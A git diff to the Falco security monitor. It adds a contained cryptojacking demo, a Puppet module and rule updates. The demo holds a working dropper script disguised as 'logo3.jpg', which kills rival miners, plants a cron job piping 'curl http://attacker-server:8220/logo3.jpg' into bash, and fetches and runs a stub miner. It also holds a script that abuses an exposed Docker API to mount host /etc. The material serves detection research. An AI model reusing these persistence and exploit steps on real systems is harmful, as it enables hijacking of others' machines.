diff --git a/examples/bad-mount-cryptomining/README.md b/examples/bad-mount-cryptomining/README.md new file mode 100644 index 00000000..d0d8a1b5 --- /dev/null +++ b/examples/bad-mount-cryptomining/README.md @@ -0,0 +1,117 @@ +# Demo of Falco Detecting Cryptomining Exploit + +## Introduction + +Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Sysdig Falco. + +Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/). + +## Requirements + +In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl. + +## Example architecture + +The example consists of the following: + +* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host. +* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker. +* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information. + +All of the above are configured in the docker-compose file [demo.yml](./demo.yml). + +A separate container is created to launch the attack: + +* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json). + +## Example Walkthrough + +### Start everything using docker-compose + +To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc. + +Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers. + +You will see fairly verbose output from dockerd: + +``` +host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1 +host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1 +``` + +When you see log output like the following, you know that falco is started and ready: + +``` +falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml +falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml +falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml +``` + +### Launch malicious container + +To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`. + +The script `launch_malicious_container.sh` performs the necessary POSTs: + +* `http://localhost:2375/images/create?fromImage=alpine&tag=latest` +* `http://localhost:2375/containers/create?&name=docker123321-mysql` +* `http://localhost:2375/containers/docker123321-mysql/start` + +Run the script via `bash launch_malicious_container.sh`. + +### Examine cron output as malicious software is installed & run + +`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host: + +``` +* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s +``` + +It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it. + +You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following: + +``` +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql +``` + +Once the cron job runs, you will see output like the following: + +``` +host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s +host-machine_1 | ***Checking for existing Miner program +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-" +host-machine_1 | ***Killing competing Miner programs +host-machine_1 | ***Reinstalling cron job to run Miner program +host-machine_1 | ***Configuring Miner program +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-" +attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-" +host-machine_1 | ***Configuring system for Miner program +host-machine_1 | vm.nr_hugepages = 9 +host-machine_1 | ***Running Miner program +host-machine_1 | ***Ensuring Miner program is alive +host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3 +host-machine_1 | /var/tmp +host-machine_1 | runing..... +host-machine_1 | ***Ensuring Miner program is alive +host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3 +host-machine_1 | /var/tmp +host-machine_1 | runing..... +``` + +### Observe Falco detecting malicious activity + +To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount: + +``` +falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate) +falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate) +``` + +### Cleanup + +To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`. + diff --git a/examples/bad-mount-cryptomining/attacker-nginx.conf b/examples/bad-mount-cryptomining/attacker-nginx.conf new file mode 100644 index 00000000..dbbc349f --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker-nginx.conf @@ -0,0 +1,14 @@ +server { + listen 8220; + server_name localhost; + + location / { + root /usr/share/nginx/html; + index index.html index.htm; + } + + error_page 500 502 503 504 /50x.html; + location = /50x.html { + root /usr/share/nginx/html; + } +} diff --git a/examples/bad-mount-cryptomining/attacker_files/config_1.json b/examples/bad-mount-cryptomining/attacker_files/config_1.json new file mode 100644 index 00000000..daffe428 --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/config_1.json @@ -0,0 +1 @@ +{"config": "some-bitcoin-miner-config-goes-here"} diff --git a/examples/bad-mount-cryptomining/attacker_files/logo3.jpg b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg new file mode 100644 index 00000000..308aa79c --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg @@ -0,0 +1,64 @@ +#!/bin/sh +echo "***Checking for existing Miner program" +ps -fe|grep jaav |grep -v grep +if [ $? -eq 0 ] +then +pwd +else + +echo "***Killing competing Miner programs" +rm -rf /var/tmp/ysjswirmrm.conf +rm -rf /var/tmp/sshd +ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9 +ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9 + +echo "***Reinstalling cron job to run Miner program" +crontab -r || true && \ +echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \ +crontab /tmp/cron || true && \ +rm -rf /tmp/cron || true + +echo "***Configuring Miner program" +curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json +curl -so /var/tmp/jaav http://attacker-server:8220/minerd +chmod 777 /var/tmp/jaav +cd /var/tmp + +echo "***Configuring system for Miner program" +cd /var/tmp +proc=`grep -c ^processor /proc/cpuinfo` +cores=$(($proc+1)) +num=$(($cores*3)) +/sbin/sysctl -w vm.nr_hugepages=$num + +echo "***Running Miner program" +nohup ./jaav -c config.json -t `echo $cores` >/dev/null & +fi + +echo "***Ensuring Miner program is alive" +ps -fe|grep jaav |grep -v grep +if [ $? -eq 0 ] +then +pwd +else + +echo "***Reconfiguring Miner program" +curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json +curl -so /var/tmp/jaav http://attacker-server:8220/minerd +chmod 777 /var/tmp/jaav +cd /var/tmp + +echo "***Reconfiguring system for Miner program" +proc=`grep -c ^processor /proc/cpuinfo` +cores=$(($proc+1)) +num=$(($cores*3)) +/sbin/sysctl -w vm.nr_hugepages=$num + +echo "***Restarting Miner program" +nohup ./jaav -c config.json -t `echo $cores` >/dev/null & +fi +echo "runing....." diff --git a/examples/bad-mount-cryptomining/attacker_files/minerd b/examples/bad-mount-cryptomining/attacker_files/minerd new file mode 100755 index 00000000..5bfce354 --- /dev/null +++ b/examples/bad-mount-cryptomining/attacker_files/minerd @@ -0,0 +1,8 @@ +#!/bin/bash + +while true; do + echo "Mining bitcoins..." + sleep 60 +done + + \ No newline at end of file diff --git a/examples/bad-mount-cryptomining/demo.yml b/examples/bad-mount-cryptomining/demo.yml new file mode 100644 index 00000000..05816a7c --- /dev/null +++ b/examples/bad-mount-cryptomining/demo.yml @@ -0,0 +1,41 @@ +version: '3' + +volumes: + host-filesystem: + docker-socket: + +services: + host-machine: + privileged: true + build: + context: ${PWD}/host-machine + dockerfile: ${PWD}/host-machine/Dockerfile + volumes: + - host-filesystem:/etc + - docker-socket:/var/run + ports: + - "2375:2375" + depends_on: + - "falco" + + attacker-server: + image: nginx:latest + ports: + - "8220:8220" + volumes: + - ${PWD}/attacker_files:/usr/share/nginx/html + - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf + depends_on: + - "falco" + + falco: + image: sysdig/falco:latest + privileged: true + volumes: + - docker-socket:/host/var/run + - /dev:/host/dev + - /proc:/host/proc:ro + - /boot:/host/boot:ro + - /lib/modules:/host/lib/modules:ro + - /usr:/host/usr:ro + tty: true diff --git a/examples/bad-mount-cryptomining/docker123321-mysql-container.json b/examples/bad-mount-cryptomining/docker123321-mysql-container.json new file mode 100644 index 00000000..0bbe12d8 --- /dev/null +++ b/examples/bad-mount-cryptomining/docker123321-mysql-container.json @@ -0,0 +1,7 @@ +{ + "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"], + "Image": "alpine:latest", + "HostConfig": { + "Binds": ["/etc:/mnt/etc"] + } +} diff --git a/examples/bad-mount-cryptomining/host-machine/Dockerfile b/examples/bad-mount-cryptomining/host-machine/Dockerfile new file mode 100644 index 00000000..ca85a7a1 --- /dev/null +++ b/examples/bad-mount-cryptomining/host-machine/Dockerfile @@ -0,0 +1,12 @@ +FROM docker:stable-dind + +RUN set -ex \ + && apk add --no-cache \ + bash curl + +COPY start-cron-and-dind.sh /usr/local/bin + +ENTRYPOINT ["start-cron-and-dind.sh"] +CMD [] + + diff --git a/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh new file mode 100755 index 00000000..6e231624 --- /dev/null +++ b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh @@ -0,0 +1,11 @@ +#!/bin/sh + +# Start docker-in-docker, but backgrounded with its output still going +# to stdout/stderr. +dockerd-entrypoint.sh & + +# Start cron in the foreground with a moderate level of debugging to +# see job output. +crond -f -d 6 + + diff --git a/examples/bad-mount-cryptomining/launch_malicious_container.sh b/examples/bad-mount-cryptomining/launch_malicious_container.sh new file mode 100644 index 00000000..7f586b00 --- /dev/null +++ b/examples/bad-mount-cryptomining/launch_malicious_container.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +echo "Pulling alpine:latest image to docker-in-docker instance" +curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest' + +echo "Creating container mounting /etc from host-machine" +curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql' + +echo "Running container mounting /etc from host-machine" +curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start' + + + + diff --git a/examples/puppet-module/README.md b/examples/puppet-module/README.md new file mode 100644 index 00000000..d088b09a --- /dev/null +++ b/examples/puppet-module/README.md @@ -0,0 +1,3 @@ +# Example Puppet Falco Module + +This contains an example [Puppet](https://puppet.com/) module for Falco. diff --git a/examples/puppet-module/sysdig-falco/Gemfile b/examples/puppet-module/sysdig-falco/Gemfile new file mode 100644 index 00000000..7bd34cda --- /dev/null +++ b/examples/puppet-module/sysdig-falco/Gemfile @@ -0,0 +1,7 @@ +source 'https://rubygems.org' + +puppetversion = ENV.key?('PUPPET_VERSION') ? "= #{ENV['PUPPET_VERSION']}" : ['>= 3.3'] +gem 'puppet', puppetversion +gem 'puppetlabs_spec_helper', '>= 0.1.0' +gem 'puppet-lint', '>= 0.3.2' +gem 'facter', '>= 1.7.0' diff --git a/examples/puppet-module/sysdig-falco/README.md b/examples/puppet-module/sysdig-falco/README.md new file mode 100644 index 00000000..8e8f89ea --- /dev/null +++ b/examples/puppet-module/sysdig-falco/README.md @@ -0,0 +1,241 @@ +# falco + +#### Table of Contents + +1. [Overview](#overview) +2. [Module Description - What the module does and why it is useful](#module-description) +3. [Setup - The basics of getting started with falco](#setup) + * [What falco affects](#what-falco-affects) + * [Beginning with falco](#beginning-with-falco) +4. [Usage - Configuration options and additional functionality](#usage) +5. [Reference - An under-the-hood peek at what the module is doing and how](#reference) +5. [Limitations - OS compatibility, etc.](#limitations) +6. [Development - Guide for contributing to the module](#development) + +## Overview + +Sysdig Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Powered by sysdig’s system call capture infrastructure, falco lets you continuously monitor and detect container, application, host, and network activity... all in one place, from one source of data, with one set of rules. + +#### What kind of behaviors can Falco detect? + +Falco can detect and alert on any behavior that involves making Linux system calls. Thanks to Sysdig's core decoding and state tracking functionality, falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, you can easily detect things like: + +- A shell is run inside a container +- A container is running in privileged mode, or is mounting a sensitive path like `/proc` from the host. +- A server process spawns a child process of an unexpected type +- Unexpected read of a sensitive file (like `/etc/shadow`) +- A non-device file is written to `/dev` +- A standard system binary (like `ls`) makes an outbound network connection + +## Module Description + +This module configures falco as a systemd service. You configure falco +to send its notifications to one or more output channels (syslog, +files, programs). + +## Setup + +### What falco affects + +This module affects the following: + +* The main falco configuration file `/etc/falco/falco.yaml`, including +** Output format (JSON vs plain text) +** Log level +** Rule priority level to run +** Output buffering +** Output throttling +** Output channels (syslog, file, program) + +### Beginning with falco + +To have Puppet install falco with the default parameters, declare the falco class: + +``` puppet +class { 'falco': } +``` + +When you declare this class with the default options, the module: + +* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system. +* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled. +* Starts the falco service. + +## Usage + +### Enabling file output + +To enable file output, set the `file_output` hash, as follows: + +``` puppet +class { 'falco': + file_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco-events.txt' + }, +} +``` + +### Enabling program output + +To enable program output, set the `program_output` hash and optionally the `json_output` parameters, as follows: + +``` puppet +class { 'falco': + json_output => 'true', + program_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, +} +``` + +## Reference + +* [**Public classes**](#public-classes) + * [Class: falco](#class-falco) + +### Public Classes + +#### Class: `falco` + +Guides the basic setup and installation of falco on your system. + +When this class is declared with the default options, Puppet: + +* Installs the appropriate falco software package and installs the falco-probe kernel module for your operating system. +* Creates the required configuration file `/etc/falco/falco.yaml`. By default only syslog output is enabled. +* Starts the falco service. + +You can simply declare the default `falco` class: + +``` puppet +class { 'falco': } +``` + +###### `rules_file` + +An array of files for falco to load. Order matters--the first file listed will be loaded first. + +Default: `['/etc/falco/falco_rules.yaml', '/etc/falco/falco_rules.local.yaml']` + +##### `json_output` + +Whether to output events in json or text. + +Default: `false` + +##### `log_stderr` + +Send falco's logs to stderr. Note: this is not notifications, this is +logs from the falco daemon itself. + +Default: `false` + +##### `log_syslog` + +Send falco's logs to syslog. Note: this is not notifications, this is +logs from the falco daemon itself. + +Default: `true` + +##### `log_level` + +Minimum log level to include in logs. Note: these levels are +separate from the priority field of rules. This refers only to the +log level of falco's internal logging. Can be one of "emergency", +"alert", "critical", "error", "warning", "notice", "info", "debug". + +Default: `info` + +##### `priority` + +Minimum rule priority level to load and run. All rules having a +priority more severe than this level will be loaded/run. Can be one +of "emergency", "alert", "critical", "error", "warning", "notice", +"info", "debug". + +Default: `debug` + +##### `buffered_outputs` + +Whether or not output to any of the output channels below is +buffered. + +Default: `true` + +##### `outputs_rate`/`outputs_max_burst` + +A throttling mechanism implemented as a token bucket limits the +rate of falco notifications. This throttling is controlled by the following configuration +options: + +* `outputs_rate`: the number of tokens (i.e. right to send a notification) + gained per second. Defaults to 1. +* `outputs_max_burst`: the maximum number of tokens outstanding. Defaults to 1000. + +##### `syslog_output + +Controls syslog output for notifications. Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `true`. + +Example: + +``` puppet +class { 'falco': + syslog_output => { + 'enabled' => 'true', + }, +} +``` + +##### `file_output` + +Controls file output for notifications. Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `false`. +* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`. +* `filename`: Notifications will be written to this file. + +Example: + +``` puppet +class { 'falco': + file_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco-events.txt' + }, +} +``` + +##### `program_output + +Controls program output for notifications. Value: a hash, containing the following: + +* `enabled`: `true` or `false`. Default: `false`. +* `keep_alive`: If keep_alive is set to true, the file will be opened once and continuously written to, with each output message on its own line. If keep_alive is set to false, the file will be re-opened for each output message. Default: `false`. +* `program`: Notifications will be written to this program. + +Example: + +``` puppet +class { 'falco': + program_output => { + 'enabled' => 'true', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, +} +``` + +## Limitations + +The module works where falco works as a daemonized service (generally, Linux only). + +## Development + +For more information on Sysdig Falco, visit our [github](https://github.com/draios/falco) or [web site](https://sysdig.com/opensource/falco/). diff --git a/examples/puppet-module/sysdig-falco/Rakefile b/examples/puppet-module/sysdig-falco/Rakefile new file mode 100644 index 00000000..d1e11f79 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/Rakefile @@ -0,0 +1,18 @@ +require 'rubygems' +require 'puppetlabs_spec_helper/rake_tasks' +require 'puppet-lint/tasks/puppet-lint' +PuppetLint.configuration.send('disable_80chars') +PuppetLint.configuration.ignore_paths = ["spec/**/*.pp", "pkg/**/*.pp"] + +desc "Validate manifests, templates, and ruby files" +task :validate do + Dir['manifests/**/*.pp'].each do |manifest| + sh "puppet parser validate --noop #{manifest}" + end + Dir['spec/**/*.rb','lib/**/*.rb'].each do |ruby_file| + sh "ruby -c #{ruby_file}" unless ruby_file =~ /spec\/fixtures/ + end + Dir['templates/**/*.erb'].each do |template| + sh "erb -P -x -T '-' #{template} | ruby -c" + end +end diff --git a/examples/puppet-module/sysdig-falco/manifests/config.pp b/examples/puppet-module/sysdig-falco/manifests/config.pp new file mode 100644 index 00000000..68ccd594 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/config.pp @@ -0,0 +1,13 @@ +# == Class: falco::config +class falco::config inherits falco { + + file { '/etc/falco/falco.yaml': + notify => Service['falco'], + ensure => file, + owner => 'root', + group => 'root', + mode => '0644', + content => template('falco/falco.yaml.erb'), + } + +} \ No newline at end of file diff --git a/examples/puppet-module/sysdig-falco/manifests/init.pp b/examples/puppet-module/sysdig-falco/manifests/init.pp new file mode 100644 index 00000000..1e944b1e --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/init.pp @@ -0,0 +1,31 @@ +class falco ( + $rules_file = [ + '/etc/falco/falco_rules.yaml', + '/etc/falco/falco_rules.local.yaml' + ], + $json_output = 'false', + $log_stderr = 'false', + $log_syslog = 'true', + $log_level = 'info', + $priority = 'debug', + $buffered_outputs = 'true', + $outputs_rate = 1, + $outputs_max_burst = 1000, + $syslog_output = { + 'enabled' => 'true' + }, + $file_output = { + 'enabled' => 'false', + 'keep_alive' => 'false', + 'filename' => '/tmp/falco_events.txt' + }, + $program_output = { + 'enabled' => 'false', + 'keep_alive' => 'false', + 'program' => 'curl http://some-webhook.com' + }, + ) { + include falco::install + include falco::config + include falco::service +} diff --git a/examples/puppet-module/sysdig-falco/manifests/install.pp b/examples/puppet-module/sysdig-falco/manifests/install.pp new file mode 100644 index 00000000..a057559d --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/install.pp @@ -0,0 +1,6 @@ +# == Class: falco::install +class falco::install inherits falco { + package { 'falco': + ensure => installed, + } +} \ No newline at end of file diff --git a/examples/puppet-module/sysdig-falco/manifests/service.pp b/examples/puppet-module/sysdig-falco/manifests/service.pp new file mode 100644 index 00000000..0d3c21e8 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/manifests/service.pp @@ -0,0 +1,11 @@ +# == Class: falco::service +class falco::service inherits falco { + + service { 'falco': + ensure => running, + enable => true, + hasstatus => true, + hasrestart => true, + require => Package['falco'], + } +} diff --git a/examples/puppet-module/sysdig-falco/metadata.json b/examples/puppet-module/sysdig-falco/metadata.json new file mode 100644 index 00000000..b3ffecd8 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/metadata.json @@ -0,0 +1,14 @@ +{ + "name": "sysdig-falco", + "version": "0.1.0", + "author": "sysdig", + "summary": "Sysdig Falco: Behavioral Activity Monitoring With Container Support", + "license": "GPLv2", + "source": "https://github.com/draios/falco", + "project_page": "https://github.com/draios/falco", + "issues_url": "https://github.com/draios/falco/issues", + "dependencies": [ + {"name":"puppetlabs-stdlib","version_requirement":">= 1.0.0"} + ] +} + diff --git a/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb b/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb new file mode 100644 index 00000000..05f94ad1 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/spec/classes/init_spec.rb @@ -0,0 +1,7 @@ +require 'spec_helper' +describe 'falco' do + + context 'with defaults for all parameters' do + it { should contain_class('falco') } + end +end diff --git a/examples/puppet-module/sysdig-falco/spec/spec_helper.rb b/examples/puppet-module/sysdig-falco/spec/spec_helper.rb new file mode 100644 index 00000000..2c6f5664 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/spec/spec_helper.rb @@ -0,0 +1 @@ +require 'puppetlabs_spec_helper/module_spec_helper' diff --git a/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb b/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb new file mode 100644 index 00000000..17fbb423 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/templates/falco.yaml.erb @@ -0,0 +1,96 @@ +#### +# THIS FILE MANAGED BY PUPPET. DO NOT MODIFY +#### + +# File(s) containing Falco rules, loaded at startup. +# +# falco_rules.yaml ships with the falco package and is overridden with +# every new software version. falco_rules.local.yaml is only created +# if it doesn't exist. If you want to customize the set of rules, add +# your customizations to falco_rules.local.yaml. +# +# The files will be read in the order presented here, so make sure if +# you have overrides they appear in later files. +rules_file: +<% Array(@rules_file).each do |file| -%> + - <%= file %> +<% end -%> + +# Whether to output events in json or text +json_output: <%= @json_output %> + +# Send information logs to stderr and/or syslog Note these are *not* security +# notification logs! These are just Falco lifecycle (and possibly error) logs. +log_stderr: <%= @log_stderr %> +log_syslog: <%= @log_syslog %> + +# Minimum log level to include in logs. Note: these levels are +# separate from the priority field of rules. This refers only to the +# log level of falco's internal logging. Can be one of "emergency", +# "alert", "critical", "error", "warning", "notice", "info", "debug". +log_level: <%= @log_level %> + +# Minimum rule priority level to load and run. All rules having a +# priority more severe than this level will be loaded/run. Can be one +# of "emergency", "alert", "critical", "error", "warning", "notice", +# "info", "debug". +priority: <%= @priority %> + +# Whether or not output to any of the output channels below is +# buffered. Defaults to true +buffered_outputs: <%= @buffered_outputs %> + +# A throttling mechanism implemented as a token bucket limits the +# rate of falco notifications. This throttling is controlled by the following configuration +# options: +# - rate: the number of tokens (i.e. right to send a notification) +# gained per second. Defaults to 1. +# - max_burst: the maximum number of tokens outstanding. Defaults to 1000. +# +# With these defaults, falco could send up to 1000 notifications after +# an initial quiet period, and then up to 1 notification per second +# afterward. It would gain the full burst back after 1000 seconds of +# no activity. + +outputs: + rate: <%= @outputs_rate %> + max_burst: <%= @outputs_max_burst %> + +# Where security notifications should go. +# Multiple outputs can be enabled. +<% unless @syslog_output.nil? -%> +syslog_output: + enabled: <%= @syslog_output['enabled'] %> +<% end -%> + +# If keep_alive is set to true, the file will be opened once and +# continuously written to, with each output message on its own +# line. If keep_alive is set to false, the file will be re-opened +# for each output message. +<% unless @file_output.nil? -%> +file_output: + enabled: <%= @file_output['enabled'] %> + keep_alive: <%= @file_output['keep_alive'] %> + filename: <%= @file_output['filename'] %> +<% end -%> + +# Possible additional things you might want to do with program output: +# - send to a slack webhook: +# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX" +# - logging (alternate method than syslog): +# program: logger -t falco-test +# - send over a network connection: +# program: nc host.example.com 80 + +# If keep_alive is set to true, the program will be started once and +# continuously written to, with each output message on its own +# line. If keep_alive is set to false, the program will be re-spawned +# for each output message. + +<% unless @program_output.nil? -%> +program_output: + enabled: <%= @program_output['enabled'] %> + keep_alive: <%= @program_output['keep_alive'] %> + program: <%= @program_output['program'] %> +<% end -%> + diff --git a/examples/puppet-module/sysdig-falco/tests/init.pp b/examples/puppet-module/sysdig-falco/tests/init.pp new file mode 100644 index 00000000..8e70cc66 --- /dev/null +++ b/examples/puppet-module/sysdig-falco/tests/init.pp @@ -0,0 +1,12 @@ +# The baseline for module testing used by Puppet Labs is that each manifest +# should have a corresponding test manifest that declares that class or defined +# type. +# +# Tests are then run by using puppet apply --noop (to check for compilation +# errors and view a log of events) or by fully applying the test in a virtual +# environment (to compare the resulting system state to the desired state). +# +# Learn more about module testing here: +# http://docs.puppetlabs.com/guides/tests_smoke.html +# +include falco diff --git a/falco.yaml b/falco.yaml index a2bef48b..78c1355f 100644 --- a/falco.yaml +++ b/falco.yaml @@ -14,6 +14,11 @@ rules_file: # Whether to output events in json or text json_output: false +# When using json output, whether or not to include the "output" property +# itself (e.g. "File below a known binary directory opened for writing +# (user=root ....") in the json output. +json_include_output_property: true + # Send information logs to stderr and/or syslog Note these are *not* security # notification logs! These are just Falco lifecycle (and possibly error) logs. log_stderr: true diff --git a/rules/falco_rules.yaml b/rules/falco_rules.yaml index abfa5802..c9e0e18f 100644 --- a/rules/falco_rules.yaml +++ b/rules/falco_rules.yaml @@ -148,7 +148,8 @@ # interpreted by the filter expression. - list: rpm_binaries items: [dnf, rpm, rpmkey, yum, '"75-system-updat"', rhsmcertd-worke, subscription-ma, - repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump] + repoquery, rpmkeys, rpmq, yum-cron, yum-config-mana, yum-debug-dump, + abrt-action-sav, rpmdb_stat] - macro: rpm_procs condition: proc.name in (rpm_binaries) or proc.name in (salt-minion) @@ -408,6 +409,16 @@ condition: ((proc.pname=sh and proc.aname[2]=yum) or (proc.aname[2]=sh and proc.aname[3]=yum)) +- macro: run_by_ms_oms + condition: > + (proc.aname[3] startswith omsagent- or + proc.aname[3] startswith scx-) + +- macro: run_by_google_accounts_daemon + condition: > + (proc.aname[1] startswith google_accounts or + proc.aname[2] startswith google_accounts) + # Chef is similar. - macro: run_by_chef condition: (proc.aname[2]=chef_command_wr or proc.aname[3]=chef_command_wr or @@ -420,6 +431,9 @@ - macro: run_by_centrify condition: (proc.aname[2]=centrify or proc.aname[3]=centrify or proc.aname[4]=centrify) +- macro: run_by_puppet + condition: (proc.aname[2]=puppet or proc.aname[3]=puppet) + # Also handles running semi-indirectly via scl - macro: run_by_foreman condition: > @@ -464,20 +478,34 @@ - macro: perl_running_updmap condition: (proc.cmdline startswith "perl /usr/bin/updmap") +- macro: perl_running_centrifydc + condition: (proc.cmdline startswith "perl /usr/share/centrifydc") + - macro: parent_ucf_writing_conf condition: (proc.pname=ucf and proc.aname[2]=frontend) - macro: consul_template_writing_conf - condition: (proc.name=consul-template and fd.name startswith /etc/haproxy) + condition: > + ((proc.name=consul-template and fd.name startswith /etc/haproxy) or + (proc.name=reload.sh and proc.aname[2]=consul-template and fd.name startswith /etc/ssl)) - macro: countly_writing_nginx_conf condition: (proc.cmdline startswith "nodejs /opt/countly/bin" and fd.name startswith /etc/nginx) -- macro: omiagent_writing_conf - condition: (proc.name in (omiagent,PerformInventor) and fd.name startswith /etc/opt/omi/conf/) +- macro: ms_oms_writing_conf + condition: > + ((proc.name in (omiagent,omsagent,in_heartbeat_r*,omsadmin.sh,PerformInventor) + or proc.pname in (omi.postinst,omsconfig.posti,scx.postinst,omsadmin.sh,omiagent)) + and (fd.name startswith /etc/opt/omi or fd.name startswith 